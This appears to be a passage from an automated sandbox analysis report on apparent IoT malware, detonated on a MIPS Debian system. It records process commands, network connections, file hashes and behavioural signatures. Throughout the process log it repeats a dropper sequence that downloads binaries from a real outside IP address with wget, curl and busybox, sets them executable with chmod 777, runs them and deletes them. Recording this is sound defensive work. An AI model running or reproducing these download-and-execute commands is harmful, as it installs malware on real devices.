[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/chmod
[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ
[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/rm
[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/chmod
[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q
[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/rm
[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/wget
[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/chmod
[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0
[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/rm
[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/wget
[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/chmod
[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0
[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/rm
[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/wget
[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/chmod
[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC
[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/rm
[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/wget
[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/chmod
[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ
[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/rm
[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/chmod
[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q
[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/rm
[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/wget
[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/chmod
[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0
[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/rm
[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/wget
[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/chmod
[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0
[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/rm
[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/wget
[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/chmod
[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m
[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/rm
[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/wget
[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/chmod
[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J
[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/rm
[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/wget
[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/chmod
[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O
[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/rm
[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/wget
[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/chmod
[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB
[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/rm
[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/wget
[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/chmod
[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4
[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/rm
[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/wget
[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/chmod
[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O
[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/rm
[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/wget
[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/chmod
[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz
[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/rm
[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/wget
[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/chmod
[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE
[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/rm
[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/wget
[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/chmod
[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx
[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/rm
[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/757-1-0xb6697000-0xb66a8044-memory.dmp
memory/779-2-0xb6775000-0xb6786044-memory.dmp
memory/895-3-0xb66d0000-0xb66e1044-memory.dmp
memory/907-4-0xb66f4000-0xb6705044-memory.dmp
memory/915-5-0xb672a000-0xb673b044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 02:42
Reported
2024-11-14 02:44
Platform
debian9-mipsbe-20240418-en
Max time kernel
71s
Max time network
73s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | N/A |
| N/A | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | N/A |
| N/A | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | N/A |
| N/A | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | N/A |
| N/A | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | N/A |
| N/A | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | N/A |
| N/A | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | N/A |
| N/A | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | N/A |
| N/A | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | N/A |
| N/A | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | N/A |
| N/A | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | N/A |
| N/A | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | N/A |
| N/A | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | N/A |
| N/A | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | N/A |
| N/A | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | N/A |
| N/A | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | N/A |
| N/A | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | N/A |
| N/A | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | N/A |
| N/A | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | N/A |
| N/A | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | N/A |
| N/A | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | N/A |
| N/A | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | N/A |
| N/A | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | N/A |
| N/A | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | N/A |
| N/A | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | N/A |
| N/A | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | N/A |
| N/A | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | N/A |
| N/A | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /usr/bin/curl | N/A |
